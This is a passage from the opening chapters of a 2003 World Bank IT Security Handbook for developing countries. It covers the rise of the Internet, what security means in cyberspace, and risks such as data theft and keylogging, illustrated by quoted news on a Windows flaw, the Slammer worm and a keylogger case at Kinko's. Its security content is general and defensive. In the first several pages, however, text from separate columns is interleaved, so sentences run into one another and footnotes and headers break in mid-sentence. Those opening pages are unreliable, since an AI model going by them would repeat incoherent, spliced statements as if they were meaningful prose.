This tech- factors to vandalism, sabotage, and theft, with nology benefits all countries and peoples, but may have suggestions on how to address these threats; a special attraction for developing countries in that it · the mechanisms for protecting information from can help to accelerate their integration into the world unwanted exposure, tampering, or destruction, known economic community. The stakes are high for these as confidentiality (preventing unauthorized users countries. Foreign direct investment, confidence, and from accessing or modifying data and programs) trust in a developing country depend upon a secure and and integrity (insuring that information and software effective implementation of technology and infrastruc- remain intact and correct); ture. Governments, organizations, and individuals all · procedures for handling users: identification, have a part to play in assuring the security of the coun- authentication, and authorization; try's electronic and information assets. · common security problems that affect computers Information Technology Security Handbook EXECUTIVE SUMMARY 11 This Handbook contains a set of current best practices in security that may assist the reader in implementing the policies and procedures that are relevant to his or her situation. In addition, it includes ample references to other materials, both electronic and print, that cover specific aspects of IT security. This Handbook is one step in assisting with knowledge transfer and capacity building at the local level in the developing world. To this end, the IT Security Handbook will be offered by The World Bank as a print publication, a CD ROM, and a website which will be updated with fresh material on a regular basis. This first edition of the Handbook will be presented at the WSIS Conference in Geneva, Switzerland in December 2003. The World Bank enjoys copyright protection under protocol 2 of the Universal Copyright Convention. 
This material may nonetheless be copied for research, educational, or scholarly purposes only in member countries of the World Bank that are considered to be developing countries. The findings, interpretations, and conclusions expressed in this document are entirely those of the authors and should not be attributed to the World Bank, to its affiliated organizations, or to the members of its Board of Directors or the countries they represent. The IT Security Handbook is a living document and all of its sections can be found on the web site: http://www.infodev-security.net. Each section will be updated periodically with additional information on global IT security issues. Readers who would like to recommend material for publication in these updates are encouraged to send suggestions via e-mail to contact@infodev-security.net. 13 P A R T O N E I N T R O D U C T I O N CHAPTER 1. IT SECURITY IN THE DIGITAL AGE 14 CHAPTER 1. commercial business applications of all kinds, including IT SECURITY IN THE DIGITAL AGE financial transactions. The availability and reliability of the Internet is essential to the continued prosperity Introduction of developed countries, and it is quickly becoming important for developing countries as well. One of the most striking technological developments of The effects of the computer and the Internet revolution the last fifty years has been the emergence of digital go far beyond their direct uses and these effects are technology as a powerful force in our lives.5 For many of profound. us, this technology is embodied in the digital computer, which has evolved to be an essential tool for our work First, the Internet is capable of radically diminishing as well as our personal needs. In 1951, when the first the geographic isolation of those connected to it. The commercial electronic digital computer, a UNIVAC I, was Internet is facilitating globalization by providing a delivered to the U.S. 
Bureau of the Census, computers communications medium where everyone linked to it, were essentially unknown to most people, and were regardless of his or her location, is effectively the same found only in a few research laboratories and universi- distance away. Search engines underscore this change; ties. They were large, expensive, and prone to frequent search results are based upon content, not distance, so failure. In contrast, today's computers are relatively that web sites of firms in developing countries have an small, inexpensive, reliable, and are found in every equal opportunity to be seen in developed countries. country. Second, the Internet is a strong influence towards Shortly after computers became commonplace at disintermediation, i.e. the elimination of intermediaries universities, research projects were initiated to link (middlemen) in business and administrative functions. them together so that information could be passed One example is the drastic reduction in the number of between them. One such early project, the development secretaries employed in developed countries. The word of the ARPANET, was highly successful and led to what processor and electronic mail have made it easier for we know today as the Internet. From an initial network people to compose, print, and send their own messages of four computers in 1969, the Internet has evolved to than to tell a secretary what to type. Similarly, the the point today where it links over 300,000,000 com- travel agent industry is currently shrinking, due to puters worldwide. the public's new ability to book air and rail tickets and hotel rooms on-line. This is a development that saves The emergence of the World Wide Web, developed by the customer time, money, and, with the additional Tim Berners-Lee and Robert Cailliau at the Center control over one's preferences, may increase the chances for European Nuclear Research (CERN) in Geneva in of having a pleasant trip. 
The emergence of companies the early 1990s, is a powerful service that use the selling books, music, and electronics on-line has Internet to create a global information system and impacted the share of business going to classical off- increased substantially the Internet's utility and line retail shops, but at the same time may have attractiveness. Although many people equate the increased the size of the overall market in some sectors. Internet and the World Wide Web, the Web is While these off-line professions and industries will actually only one service out of many, albeit a continue to exist, they are likely to employ fewer peo- major one, that makes the Internet such a powerful ple and may their market share erode, and could move tool for information and communication. to specializing in niche markets rather than providing general services. The effects of disintermediation that Within the past ten years, the Internet has become have been initiated by technology are likely to continue an important tool for communication in all sectors for a long time and will displace more professions and of society. We depend on it for timely access to industries as information technology evolves. information, for private correspondence, and for 5See, Digital Tornado: The Internet and Telecommunications Policy FCC Staff Working Paper on Internet Policy (1997), available at: http://www.fcc.gov/Bureaus/Miscellaneous/News_Releases/1997/nrmc7020.html Information Technology Security Handbook INTRODUCTION 15 Third, the rate at which we work (our productivity) flourish and drive the quest for new areas for commercial appears to have accelerated, at least in industries driven exploitation, creating a golden age for digital appliances. by or dependent on information technology. 
Thanks PART to electronic mail, it is possible to share information Modern telephone equipment is completely digital in around the globe in seconds, so that worldwide discussions nature; mechanical relay switching devices have been ONE and negotiations can proceed in a very rapid manner. replaced with special purpose computer systems. Business once conducted by postal mail, telex, and Since the development of the CD in the early 1980s, telephone, is now conveyed through a faster and more music and other sound recordings have been making a effective means of communication, providing reduced transition to digital form. With the introduction of the cycle times for transactions. MP3 music format in the late 1990s, music and sounds have been recorded digitally, even in home environments. Finally, it is essential to maintain secure information Even data dense images are now digitized and cameras storage and communication links in this new environ- that record digital images are rapidly replacing images ment. The high-tech industry is actively exploring ways recorded on photographic film for many applications. of ensuring the security of its infrastructure; the partici- Even movies and animation are going digital, as the costs pants understand that security breaches stemming from of the relevant production and dissemination technologies insecure hardware and software along the Internet will are declining. The DVD is starting to replace videotape, inhibit some of the major promises of this new medium movies are made and edited with digital enhancements, from being realized. The establishment of trust in sound and the movie industry is beginning to distribute titles and safe computers, networks, and stored data in this digitally, instead of on reels of celluloid film. Electronic new environment is as important, if not more important, projectors are now in use in some theatres. as it was in an environment based upon face to face interaction. 
Cell phone standards, both de facto and de jure, are moving to digital, with protocols such as GSM, CDMA, The lesson for developing countries is clear; organizations TDMA and their variants and spin-offs displacing the that do not have the required level of security in their earlier generation of standards based upon analog digital infrastructure and thus do not protect their con- technology. In developed countries, digital television tent and information transmissions satisfactorily will not has been introduced and may eventually displace be trusted and might be left behind in the new global existing broadcast standards, although this change economy.6 is likely to come more slowly because of the large base of installed home receivers that depend on The Digital Revolution the older standards. Digital technology these days includes much more than Physical security systems are also becoming digital just computers. Technological progress in microelectronics in nature. In hotels, apartment buildings, and offices, has made the micro-miniaturization of complex electronic physical keys are being replaced by digital access cards. devices possible, so that you may now carry the Television cameras used for monitoring security are often equivalent of a roomful of computing and communications deployed on digital platforms, sending digitized images equipment in your pocket. Moreover, the improvement to monitoring stations on a network instead of sending in the price-performance ratio for this technology is a television signal to a standard video monitor.8 about 30% per year and likely to stay at that level for another ten years.7 We expect this technology to 6Braga, Carlos Prima, Inclusión or Exclusion, UNESCO Courier, available at: http://www.fcc.gov/Bureaus/Miscellaneous/News_Releases/1997/nrmc7020.html 7This rate of technological advance is a corollary of 'Moore's law,' described by Gordon Moore, the father of Intel, in the 1960's. 
He observed that every two years (later shortened to 18 months), the technology allowed manufacturers to produce chips with double the capacity for about the same price. This trend has been observed for the past 40 years, and the industry expectation is that it will continue for another 10 years. 8Interestingly enough, this particular transformation may well export jobs to developing countries. Once the images are in digitized form and trans- mitted on the Internet, they can be sent to a monitoring system anywhere on the net. It has been suggested that this security function, which does not require specialized skills, could be set up in developing countries at lower costs, and with equal quality of service. The suggestion is welcome in a development context, but could have physical security implications in that the outsourcing depends upon crossing national boundaries. 16 INTRODUCTION Many of the services that we use today would not be for the purposes that you understand and agree to. possible without computers and networks and the Most individuals value their privacy and many digital technology on which they are based. Airlines governments have chosen to uphold individual would not be competitive without computer based rights to privacy to a certain extent, though the reservation systems and flight and maintenance level of protection varies from country to country. support systems. Planes themselves depend massively The challenge for governments is to assure that we on electronic sensors and digital controls and can realize the benefits of emerging technologies would be unable to function without them. Even and still maintain the values and freedoms that we automobiles use microprocessors to function and enjoyed without them. This is a challenge that to assist in their maintenance today. 
Global requires governments to understand the new tech- Positioning Systems (GPS) permit you to know nologies and evaluate how the devices and capabil- where you are anywhere on the earth. With this ities interact with our freedoms. Government must relatively inexpensive device and a computer also take proactive steps to ensure that legislation containing a base of maps, you are able to track and public policy reflect a lasting commitment to where you are going, find important landmarks, maintaining, if not strengthening, the freedoms restaurants, entertainment, or services along the that exist currently. way, and ultimately to reach your destination. We often refer to the digital world as cyberspace.10 These digital devices are being networked at Cyberspace includes all of the computers and other a rapid rate. Cell phones 'talk' to the Internet, digital devices that are connected to both internal transmitting initially voice and now pictures. Soon and external networks and can communicate with they will have GPS capability, so that people in each other. We can talk about meeting in cyber- trouble can be located with great precision when space and doing things in cyberspace, as opposed they make an emergency call. Many of the services to physical space. For readers of this Handbook, we use, such as ATM machines for disbursement of in particular, it is useful to make a distinction money, rely on network access. Inter-bank and between behavior in cyberspace as opposed to international financial transfers have long depend- the "real world" in which we live, work, and play. ed upon financial networks;9 nowadays, electronic personal banking transactions are accessible to The rapid spread of the personal computer and the individuals via the Internet. Internet to developing countries has brought many benefits to all sectors in those countries. 
However, the Internet by itself is not necessarily a medium secure from malicious behavior. The opportunity cost of not paying adequate attention to security can be the loss of valuable data needed to run an enterprise or a government agency. Among other things it can include destruction of essential records, identity theft, and theft of financial resources, outcomes that can not only ruin a company, but that can contribute to a reputation of unreliability for an entire industry in a country.

This explosion of digital electronics and interconnected devices presents many opportunities, but it also has a dark side. It is becoming easier for people to track where you are, to catalogue what web pages you visit, to study what you purchase at stores, and to observe what you read and watch online. If such monitoring is intended for your benefit, you probably won't object to it, but you will want to be sure that such data is collected with your permission and is used only

[9] The interbank financial transfer network has in the past used a special, highly secure, special purpose network, not logically connected to the Internet. This is appropriate, given the high value added nature of the network and the very serious consequences of any compromise of the network.

[10] "Cyberspace" was coined by author William Gibson, who used it in his 1984 novel Neuromancer to mean a parallel universe created and sustained by the world's computers: "A consensual hallucination experienced daily by billions of legitimate operators, in every nation, by children being taught mathematical concepts... A graphic representation of data abstracted from the banks of every computer in the human system. Unthinkable complexity. Lines of light ranged in the nonspace of the mind, clusters and constellations of data. Like city lights, receding..." This definition may be useful for literary purposes, but the meaning of the term has shifted substantially from Gibson's usage. See Intven, et al., Legal and Regulatory Aspects of e-Commerce and the Internet, The World Bank Legal Review, vol. 1, 2003 (Kluwer), at fn 17.

Information Technology Security Handbook INTRODUCTION

As the Internet expands and issues regarding cyber attacks become more widespread, the number of such incidents is increasing:

"Although computers have up to this point been spared a major cyber attack from terrorists or rogue nations, there have been plenty of smaller acts of vandalism by individual troublemakers. The Computer Emergency Response Team (CERT) tracked 52,658 online security incidents in 2001, more than double the number reported in the previous year, and more than four times the number reported the year before that."[11]

The issue of the security of computers and networks is especially important for developing countries. The Internet can essentially eliminate any disadvantage due to distance or remoteness of location, and it can provide access to an enormous amount of content, no matter what the distance is between the person requesting the content and the content repository itself. Together with the World Wide Web, the Internet can place businesses in developing countries on a more equal footing with respect to information about companies, their capabilities, and their products. Furthermore, search engines do not make a distinction between web sites based on geography, so that suppliers of goods and services in developing countries can be seen on a par with suppliers of those goods and services based in developed countries.[12] This is sometimes referred to as the "death of distance,"[13] a phrase which graphically describes what the Internet has accomplished for information and information flows.

However, there are real risks to business of loss of records, denial of service attacks, corruption of information, and other hostile attack effects. For a business to have all or part of its electronic records altered or erased can be devastating. For a country to have a reputation for weakness in IT security can taint its industries, regardless of the actual extent of damage that may have occurred. Lack of attention to security can result in both real and perceived damages, and can result in business failures in countries which need the confidence of external business relationships in order to prosper. Achieving the Millennium Development Goals depends on developing countries being able to use information technologies effectively and to increase their wealth by becoming integral members of global commerce.[14] The ability to obtain and supply relevant information easily can help countries in all areas of civil society, whether it is education, health care, commercial development, expansion of international markets and trade, or strengthening of local cultures.

Unfortunately, all of the manifestations of human behavior possible, good and bad, have moved into cyberspace and can be observed there. Since it is easy to copy digital content and edit it, it is also easy to falsify information, including the modifying and forging of official documents. Because the Internet evolved from a cooperative research environment, where the goal was to share information easily, the underlying structure makes it possible to break into computers and steal confidential information. The motivations of people who exhibit such behavior in cyberspace are similar to the motivations that drive them in the real world, with one significant exception. The environment created by computers and the Internet has brought out tendencies in certain people to prove that they can break into systems or cause other problems. Much of the mischief in cyberspace is caused by "crackers" who simply want to prove that they can defeat any security barriers that may be in their way. The equivalent behavior in the real world consists of someone who demonstrates that he can break into your house but, after doing so, leaves. Not only does this generate a profound feeling of insecurity, but it also raises the question of whether anything was taken or changed, or whether the next attempted entry will be more malicious. Just as such behavior in the real world can't be tolerated, neither should it be tolerated in cyberspace. Techniques in this Handbook will help you to guard against such malicious behavior.

[11] Reuters/USA Today, April 16, 2003.

[12] Search engines do differentiate on the basis of language, so that, as in the real world, you have to speak in the language of your target market. Search engines may also not have the patience to retrieve web pages at the tail end of slow connections. However, businesses can host their web sites anywhere in the world, so that information can be placed close temporally to target markets. Some businesses mirror their web sites, i.e. create copies in different geographic regions so that customer access time is minimized.

[13] Cairncross, F., The Death of Distance: How the Communications Revolution will Change our Lives, Harvard Business School Press (1997).

[14] Information and Internet security are one of the three main topics on which the World Summit on the Information Society will focus at its conferences in Geneva in December 2003 and in Tunis in April 2005. This is additional evidence of the broad recognition that the role of ICT for development is achieving.

Nothing in this Handbook or in cyberspace should make you reluctant to learn about computers and the Internet and exploit them to the fullest. Today's Internet represents the beginning of a wonderful set of transformations of the world's stock of information and knowledge, including the ability to distribute it to the general public inexpensively; information can be efficiently and effectively shared for the good of all. However, in order to realize this goal, we need to take account of possibilities and behaviors that may stand in our way. We're familiar with the concept of being "street smart" in the real world. We must now learn how to become street smart in cyberspace, or "cybersmart"; this Handbook is meant to help you accomplish just that.

What Is Security?

The notion of security in the real world is an intuitive one for most of us. In prehistoric times, security was defined by the essentials of survival such as security against attack by others or by animals, as well as security of the food supply. Other needs, such as security against the ravages of nature or against sickness, were generally not available to people of that era. As civilization progressed, the scope of security evolved to include having a place to live and sleep without harm. Along with the concept of private property came the notion of security of possessions.

Much of what we do in the world involves risk, although most of our actions involve minimal risk. For example, when we travel in an unfamiliar neighborhood, or city, or country, we are conscious of the fact that there are threats to physical security. These threats are more substantial if we are in an unprotected place and we meet someone who may be able to take advantage of us. If we are sufficiently concerned about the risk, we will avoid the location or we may choose an alternative, such as joining someone else to return to a safer location, or taking a taxi.

Some actions involve psychological or financial risk, but not physical risk. When we make an investment of any kind, say in land, in stock, or in a business, we do so with the expectation that we will obtain a return on that investment that is sufficient to justify it. As we know, some investments provide that return, even handsomely, while others do not. Some investments involve emotional risk. When we commit ourselves to a personal relationship, we hope that the relationship will provide emotional security, though we accept the risk that it may not develop that way.

In some areas, it is impossible to obtain the degrees of security that we would like to have. For example, we would all like to live a long and healthy life and many of us will do so. However, what is true for a statistical average of lifetime expectancy is not true for all individuals; some of us will die at an early age, some will develop debilitating illnesses, and others will live, in good health, to old age. Where risk of this sort is concerned, we compensate for our inability to control our physical fate with insurance that protects us against the financial impact of such events, loss of earnings in the case of illness, for example. Such arrangements highlight a truth about security: absolute security is impossible to achieve in real life and in cyberspace. However, security that is "good enough" is likely to be achievable in almost all circumstances.

There are a variety of ways in which we have historically enforced or provided enforcement mechanisms for enhancing and protecting our security. We have physical mechanisms for ensuring the security of our possessions: sturdy building construction, solid doors, and keys and locks. We may rely on other physical barriers, such as walls and other deterrents. We may choose to keep lights focused on an area of potential entry. Finally, assuming that an intrusion is initially successful, we can use alarm systems to detect it and to notify a stronger deterrent force that we need assistance. If an intrusion has been successful, we have forensic techniques at our disposal to search for clues to the event and to track down the culprit. Most important, we can rely upon civil and criminal laws and a system of enforcement and justice that each of our countries is evolving in response to our national needs.

Often we use multiple methods of maximizing our security so that if one method fails, another may work. If a key has been stolen and the lock in the door is no longer a barrier, the alarm signal may suffice to provide notice of an intrusion. The extent to which multiple barriers are used is, of course, related to the value of what is being protected. The extent to which physical security measures are put into effect is related both to what is to be protected and to the reasonable expectations that it will be attacked. All of these deterrents and methods have their analogues in cyberspace. We're not as familiar with them as we are with physical security issues, but we need to understand them and know how to use them if we are to live as securely in cyberspace as we do in the real world. In both worlds we need to protect our assets, to defend them if attacked, and to recover if the attack is successful.

The dictionary definitions of security are consistent with conditions we associate with security, such as "the quality or state of being secure, freedom from danger, and freedom from fear or anxiety."[15] However, such definitions do not seem really helpful in the context of cyberspace. Instead, we suggest the following: you are secure in cyberspace when access to your information resources is under your control, i.e. no one can do anything to the resources that are yours without your express permission. The resources include computational, access, network, transaction, process and information resources. Of course, some of these resources may have been provided by others for your use, such as an account on a shared computer or access to the Internet by an Internet Service Provider. While they are never completely secure, you have effective control over having continued access to them to the extent that you follow the rules that the providers set for their appropriate use.

An example of the nature of cyber-security is provided here: the recent discovery of a flaw found in the core of the Microsoft Windows operating system:

"Microsoft Corp. acknowledged a critical vulnerability Wednesday in nearly all versions of its flagship Windows operating system software, the first such design flaw to affect its latest Windows Server 2003 software. Microsoft said the vulnerability could allow hackers to seize control of a victim's Windows computer over the Internet, stealing data, deleting files or eavesdropping on e-mails. The company urged customers to immediately apply a free software repairing patch available from Microsoft's Web site...

The flaw, discovered by researchers in western Poland, also affected Windows versions popular among home users. "This is one of the worst Windows vulnerabilities ever," said Marc Maiffret, an executive at eEye Digital Security Inc. of Aliso Viejo, Calif., whose researchers discovered similarly dangerous flaws in at least three earlier versions of Windows. Maiffret said that inside vulnerable corporations, 'until they have this patch installed, it will be Swiss cheese - anybody can walk in and out of their servers.'

But four Polish researchers, known as the "Last Stage of Delirium Research Group," said they discovered how to bypass the additional protections Microsoft added, just three months after the software went on sale. Although the Polish researchers created a tool to demonstrate the more serious vulnerability and break into victim computers, they promised not to release blueprints for such software onto the Internet ...

Some experts said they expected hackers to begin using this new vulnerability to break into computers within months. Even without detailed blueprints from researchers, hackers typically break apart the patches Microsoft provides for clues about how to exploit a new flaw."[16]

[15] Merriam-Webster OnLine Dictionary.

As individuals and employees within organizations we have no control over the code contained in proprietary programs like Microsoft Windows. We trust that software vendors have a strong interest in making their programs error free and secure. However, few large programs are completely error free. In response, we can take action when such problems are reported by making an informed judgment whether to download and install the vendor's 'fix' for the error. This is the extent of control that we have.

In real life, we are already knowledgeable about how we protect our information resources. We understand that some information needs to be kept private while other information can be freely circulated. We lock file cabinets and office doors and may store copies of critical information off-site to guard against loss through fire and natural disasters. We know that some information should only be circulated to a limited number of people, and we trust different people to different extents depending upon the confidentiality of the information at hand.

The nature of threats to security in cyberspace is conceptually no different from the nature of threats in the real world. The differences come from the characteristics of the electronic space in which the threats appear and the manner in which they can be thwarted, avoided, detected and resolved.

The notions of privacy and confidentiality are related to security. Information that is meant to be private can only be kept private if it is stored in a secure manner. With information in the real world, that may be accomplished by acting as if the information does not exist; such a security policy might be termed "security by obscurity." Similarly, information that needs to be confidentially shared requires that it be kept secure from those outside the group who are sharing it. If the group is not all in the same place, adequate security policies must include a way of keeping the information secure when it is transmitted among members of the group.

Similar situations exist in the world of cyberspace. However, given the nature of cyberspace and the interconnectedness of the computers within it, the policy of security by obscurity is weak policy and should be avoided. This Handbook will provide details on the special security measures required in electronic space (cyberspace) at several levels.

Emergence and Growth of the Internet

The computing and networking environment from which today's Internet evolved had its origins in a cooperative research and education culture. When the ARPANET, the predecessor to the Internet, was first implemented, the main goal was to share resources among groups of researchers in different geographical locations. The groups had compatible goals and worked toward sharing both computing resources and data. Access to the network was restricted to members of the group, so there was no need to be concerned about security at the time. The intent and design of the World Wide Web exemplifies this; it provides substantially better tools for discovering information resources and for making one's own information available to others, without any mechanisms for obtaining permissions or facilitating financial settlements.

The culture of sharing among researchers and academicians that was born in and nurtured by the ARPANET lasted well into the 1990s, and there are still vestiges of it today. It included the notion of making information as available as possible, and that tradition still exists in the form of the World Wide Web, where content of all kinds is being provided, almost free of charge, to hundreds of millions of people around the world. It was a strong culture, and it was responsible in large part for why the Internet has grown to such an enormous size today. Its ethics are reflected in the words of people who are Internet "evangelists," who see the power of the medium for development, and who work to make it happen. Sometimes called the spirit of the Internet, it is reflected in the mantra that "information wants to be free."

An alternative way of describing this situation is that the early Internet was based on trust; the community of users trusted each other implicitly to work for the common good. As the Internet has broadened its reach and included more and more people with diverse interests and objectives, the trust model has become insufficient. One of the major challenges for today's Internet is to develop a new trust model that is realistic, easy to implement, and effective in its application.

[16] Ted Bridis, The Associated Press, July 16, 2003.

The Internet is different from earlier communications systems in a variety of ways, but several are particularly important. Some differences are best understood when compared to the public switched telephone network (PSTN) that is used worldwide on a daily basis.

The Internet is based upon a model of information transmission called packet switching. Every time information is transmitted over the Internet, it is broken up into packets of binary data. The packets are encoded and sent independently over the network, possibly by different routes, and the information is reassembled at the receiving end. This mode of transmission is called packet switching, as opposed to circuit switching. The public switched telephone network uses circuit switching, in which each telephone call is allocated a single circuit for the duration of the call, no matter how much or how little sound is being transmitted at any given moment.

The Internet is "stupid"[17] in that all it knows how to do is to deliver packets from an origin connected to the network to a destination connected to the network. All services originate at the edge, or the boundary, of the Internet in the computers attached to it. This is in contrast to the PSTN, where the intelligence is at the center of the network (at the switch), and the user instruments at the edge have little functionality other than being used for speaking and listening.

The Internet is global. It connects many countries, and information generally flows freely across national borders. This characteristic raises interesting policy concerns not necessarily directly concerned with security. The PSTN is also global, but the methods of accessing phones in different countries are not as opaque as they are with the Internet. The user knows that he is dialing a foreign country, for example, whereas he may access a website without knowing where the servers are located.

The Internet is open. It is formally defined as a network of networks: any network that conforms to a family of protocols known as TCP/IP (Transmission Control Protocol/Internet Protocol) can connect successfully with it and become a part of it. The standards defining this family of protocols come from the work of the Internet Engineering Task Force (IETF), an informal technical body based on technical meritocracy and the creation of implementable consensual standards.

The Internet is decentralized. There are no system-wide gatekeepers. If you obey the "rules of the road," i.e. the TCP/IP standards, you can connect your computer or your network to the Internet.

The Internet is abundant. The barriers to entry are low, and the amount of bandwidth (i.e. how fast you can transmit data through it) depends upon the carrying capacity of the copper wires, fiber links, or satellite channels that are in the path. No scarce electromagnetic spectrum is involved for the Internet backbone. Where radio spectrum is used, for example in the deployment of local area wireless networks, often called "Wi-Fi," the relevant protocols or rules implement a sharing arrangement for the available spectrum rather than a rigid allocation that ultimately denies access to the network.

The Internet is relatively inexpensive for the average user in parts of the world where local calls are free. The price of access over dial-up lines and at cybercafés and other public Internet access points is descending in such countries, so that access is becoming broadly affordable for a greater percentage of the world's population.

The Internet erodes the traditional barrier between author and publisher; you can become a publisher or establish a network service on your computer if it is permanently attached to the Internet. You can advertise the services and, subject to permissions that you establish, anyone else connected to the Internet can connect to your computer and use those services.

The Internet is by and large user-controlled. In many countries, you can choose whether your messages and other transmissions should be encrypted or not.

[17] See Lessig, L., The Future of Ideas, Random House (2001).

INFORMATION SECURITY AND GOVERNMENT POLICIES

In addition, filtering of messages for whatever reason is under your control, although you may wish to have an external source do it for you, such as instructing your Internet Service Provider (ISP) to filter out spam messages according to rules that you set up.

The Internet is interactive. You can move quickly and easily between access to multiple content providers and sending and receiving electronic mail with many people. While waiting times for on-line services depend upon the size or bandwidth of your connection to the Internet, it is often possible to get response times that support your activities.

The Internet can be vulnerable. Based initially upon a concept of providing services to a relatively homogeneous, cooperative group of people, certain aspects of trust were assumed rather than required to undergo strict verification. This Handbook addresses the Internet's vulnerabilities and provides you with a set of best practices in security that will help you to minimize your vulnerability.

Based on the above characteristics, you should be getting a picture of an Internet that is supportive and permissive of many kinds of activity, rather than one that is restrictive and controlled. This openness strongly reflects the academic and research roots of the Internet, and is responsible for its usefulness for all of us. The Internet was not designed to maximize security, but instead to maximize the fruits of collaborative work; such a degree of openness has provided opportunities for some people to misuse the network in ways that are harmful to others. We need to understand what those misuses are and guard our networks against them.

Information Security Issues

The concepts of computer, network, and data security in cyberspace are similar to issues in the real world; however, the mechanisms are different. For example, in place of keys (physical or electronic), we have passwords to accounts that allow access to information and services. In place of sealed envelopes, we are able to encrypt information so that it is not readable by others who cannot unlock that information with the right key.

In comparing the real world with cyberspace, we also observe some of the same violations of trust and confidentiality. In both worlds, it is possible to forge a false return address and even a false signature. In both worlds, it is possible to provide misleading or erroneous information. In both worlds, it is possible to deluge someone with information, either accidentally or deliberately, making it impossible to determine which information is important and relevant.[18] And in both worlds, it is possible to gain access to confidential information and use it in unintended or illegal ways.

There are, however, three important differences.

First, violations of security of all types in cyberspace can take place very rapidly. That means that by the time you understand what is happening to your information assets, it may be too late to prevent damage. Of course, not all violations occur quickly; some attacks are observable as they occur and take time to execute. The lesson to draw from this is that preventive measures taken to protect against violations are far superior to detecting a violation while it is happening or after it has been completed.

Consider the following account of the 'Slammer worm,' which severely disrupted the Internet early in 2003. All continents and many countries were affected, including many developing countries.

"Slammer (sometimes called Sapphire) was the fastest computer worm in history. As it began spreading throughout the Internet, the worm infected more than 90% of vulnerable hosts within 10 minutes, causing significant disruption to financial, transportation, and government institutions, and precluding any human-based response ... "

"Slammer began to infect hosts slightly before 0530 UTC on Saturday, 25 January 2003, by exploiting a buffer-overflow vulnerability in computers on the Internet running Microsoft's SQL server or Microsoft SQL server Desktop Engine (MSDE) 2000. David Litchfield of Next Generation Security Software discovered this underlying indexing service weakness in July 2002. Microsoft released a patch for the vulnerability before the vulnerability was publicly disclosed (www.microsoft.com/security/slammer.asp). Exploiting this vulnerability, the worm infected at least 75,000 hosts, perhaps considerably more, and caused network outages and unforeseen consequences such as cancelled airline flights, interference with elections, and ATM failures."[19]

[18] The S.S. Titanic used relatively primitive radio to communicate from ship to shore. On its first voyage, the radio operator was so deluged with congratulatory and personal messages that a critical message, warning of significant icebergs in its path, was not identified as important or acted upon. The ship struck an iceberg and sank several hours later.

Second, you do not have to be physically present at a location, or even in the same country, to commit a security violation in cyberspace. This means that someone in Europe, for example, can probe the security of computers in India just as easily as a person located across the street from the target. In cyberspace, the threat can come from anywhere on the network. It may be directed at a known target, the target may have been selected at random, or it may have been chosen because its Internet address was in a range of addresses being probed as a unit. This omnipresent threat should change the way in which we think about security and the profile of our possible adversaries. It is worth noting that the Digital Millennium Copyright Act makes it illegal to design software that decrypts encryption software; national and global copyright regimes on this and other matters related to copyright and data protection are in active development at the present time.[20]

Third, cyberspace provides a powerful but complex environment, in which the responsibility for security is divided among multiple players. If you are a user of computing and network services, there are a number of ways to protect yourself and your personal computer. However, you cannot control your ISP's security policy or its implementation. Nor can you control your client's software, even if you are closely linked with their systems. Thus you need to assume a protective stance over your own assets, while being aware that the connections you are making with the outside world prevent you from eliminating all vulnerabilities on the network.

What are the possible risks in cyberspace? If you take no security precautions at all, here are some of the possible consequences:

Information destruction. The data stored on your computer could be deleted. It might be possible to recover it, but it could take time and the recovery might not be complete. If you are a government agency, your ability to perform your functions during this period may be compromised.

Information theft, and loss of privacy. You may or may not be aware of the theft immediately (or ever), and it is unlikely that you will know who took your data, what was taken, or what will be done with it. If a great deal of your personal information is taken, the thief might be able to steal your identity with unknowable, but probably serious, consequences.

Loss of information integrity. The information on your computer could be modified without your knowledge. Depending on what kind of information you keep, the consequences could range from trivial to disastrous. If the data include enterprise financial records, customer information, order status, or personnel files, your business dealings could be adversely affected.

Loss of network integrity on other systems and/or networks. Although you may not be attacked directly in this case, other computers to which you have access may be attacked, with trickle-down consequences to you. If you are a financial institution, you may not be able to complete financial transactions during the recovery period.

Keystroke capturing. Hidden software could be installed on your computer that would capture your keystrokes and send them to another computer. This could compromise your access to external sources, such as a protected web server, an e-mail server, financial transactions, or confidential information. Authentication tokens such as credit card numbers and passwords could be obtained by the thief and used in later transactions for his or her personal gain.

[19] Moore, Paxson, Savage, Shannon, Staniford and Weaver, "Inside the Slammer Worm," IEEE Security and Privacy, Vol. 1, No. 4, July/August 2003, pp. 33-39.

[20] For an overview of recent thinking on the Act, see the U.S. Copyright Office Digital Millennium Copyright Act Study at: http://www.copyright.gov/reports/studies/dmca/dmca_study.html The DMCA itself is available as a pdf file: http://www.copyright.gov/legislation/hr2281.pdf

Denial-of-Access. You could be denied access to your own information, even though it has not been erased. It might appear in encrypted form, where only the intruder has the decryption key.

The cost associated with recovering from any of these attacks is likely to be substantial, and the recovery process is likely to be inconvenient at the least. If you are the director of an enterprise with a critical dependence on your electronic data resources, an extremely malicious attack could lead to the demise of your enterprise. Note that the Slammer worm was indifferent to which countries it invaded and which organizations and computers it disabled; any computer that did not have a Microsoft patch installed was attacked.

One noteworthy security breach that succeeded for more than a year illustrates the novel ways in which security can be compromised in cyberspace:

"NEW YORK (AP) - For more than a year, unbeknownst to people who used Internet terminals at Kinko's stores in New York, Juju Jiang was recording what they typed, paying particular attention to their passwords. Jiang had secretly installed, in at least 14 Kinko's stores, software that logs individual keystrokes. He captured more than 450 user names and passwords, using them to access and even open bank accounts online.

The case, which led to a guilty plea earlier this month after Jiang was caught, highlights the risks and dangers of using public Internet terminals at cybercafes, libraries, airports and other establishments. "Use common sense when using any public terminal," warned Neel Mehta, research engineer at Internet Security Systems Inc. "For most day-to-day stuff like surfing the Web, you're probably all right, but for anything sensitive you should think twice." Jiang was caught when, according to court records, he used one of the stolen passwords to access a computer with GoToMyPC software, which lets individuals remotely access their own computers from elsewhere. The GoToMyPC subscriber was home at the time and suddenly saw the cursor on his computer move around the screen and files open as if by themselves. He then saw an account being opened in his name at an online payment transfer service. Jiang, who is awaiting sentencing, admitted installing Invisible KeyLogger Stealth software at Kinko's as early as Feb. 14, 2001."[21]

This Handbook is about security as applied to users, both in the home environment and in small to medium-sized businesses. Therefore, it contains extensive information on security issues, including threats and outcomes of attacks, approaches to protection of your computers, networks, and data, and also policy issues that must be considered before an effective security strategy may be implemented. The ultimate purpose of this Handbook is not to frighten users away from resources offered by the new digital environment, but to empower users to take advantage of this exciting new world in a safe and secure manner. The objective is to develop an in-depth and realistic understanding of what the security problems are, in order to minimize vulnerabilities and reap the benefits from the many positive and powerful aspects of ICTs.

What Motivates the Security Violators?

In real life, there are a variety of motivations for crimes against personal or organizational security. Financial gain is a major incentive, as is revenge against someone or something that a person feels has wronged them in some way.

